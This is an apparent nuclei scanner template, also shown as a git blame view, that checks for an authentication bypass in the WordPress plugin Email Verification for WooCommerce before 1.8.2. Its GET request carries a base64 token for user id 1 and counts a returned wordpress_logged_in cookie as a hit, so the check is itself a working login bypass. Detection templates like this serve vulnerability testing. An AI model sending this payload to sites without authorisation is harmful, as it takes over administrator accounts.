nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verifi...

id: wp-woocommerce-email-verification
info:
  name: wordpress-emails-verification-for-woocommerce
  author: random_robbie
  severity: critical
  tags: wordpress,wp-plugin
  description: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
  reference: https://wpvulndb.com/vulnerabilities/10318
  # GDPR plugin may give a false positive so double check headers

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
      - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
    
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "wordpress_logged_in"
        part: header

      - type: status
        status:
          - 401
          - 403
        negative: true
Normalized id fields to match schema regex 2020-09-15 19:25:55 +00:00			`id: wp-woocommerce-email-verification`
Update wordpress-emails-verification-for-woocommerce.yaml 2020-09-08 18:27:06 +00:00			`info:`
Update wordpress-emails-verification-for-woocommerce.yaml 2020-09-08 11:25:55 +00:00			`name: wordpress-emails-verification-for-woocommerce`
Updated author names 2021-06-09 12:20:56 +00:00			`author: random_robbie`
Create wordpress-emails-verification-for-woocommerce.yaml 2020-09-08 11:12:53 +00:00			`severity: critical`
tag updates 2021-02-16 17:02:57 +00:00			`tags: wordpress,wp-plugin`
Uncomment description and reference 2021-04-18 13:11:30 +00:00			`description: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass`
			`reference: https://wpvulndb.com/vulnerabilities/10318`
Update wordpress-emails-verification-for-woocommerce.yaml 2020-09-08 18:27:06 +00:00			`# GDPR plugin may give a false positive so double check headers`

			`requests:`
			`- method: GET`
			`path:`
Update wordpress-emails-verification-for-woocommerce.yaml 2020-09-08 11:25:55 +00:00			`- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="`
			`- "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="`
Update and rename wordpress-emails-verification-for-woocommerce.yaml to wp-woocommerce-email-verification.yaml - name changed to match template id. - added stop-at-first-match condition. 2021-10-01 01:49:21 +00:00
			`stop-at-first-match: true`
Update wordpress-emails-verification-for-woocommerce.yaml 2020-09-08 18:27:06 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "wordpress_logged_in"`
matcher updates 2021-01-11 06:44:22 +00:00			`part: header`

			`- type: status`
			`status:`
			`- 401`
			`- 403`
Update and rename wordpress-emails-verification-for-woocommerce.yaml to wp-woocommerce-email-verification.yaml - name changed to match template id. - added stop-at-first-match condition. 2021-10-01 01:49:21 +00:00			`negative: true`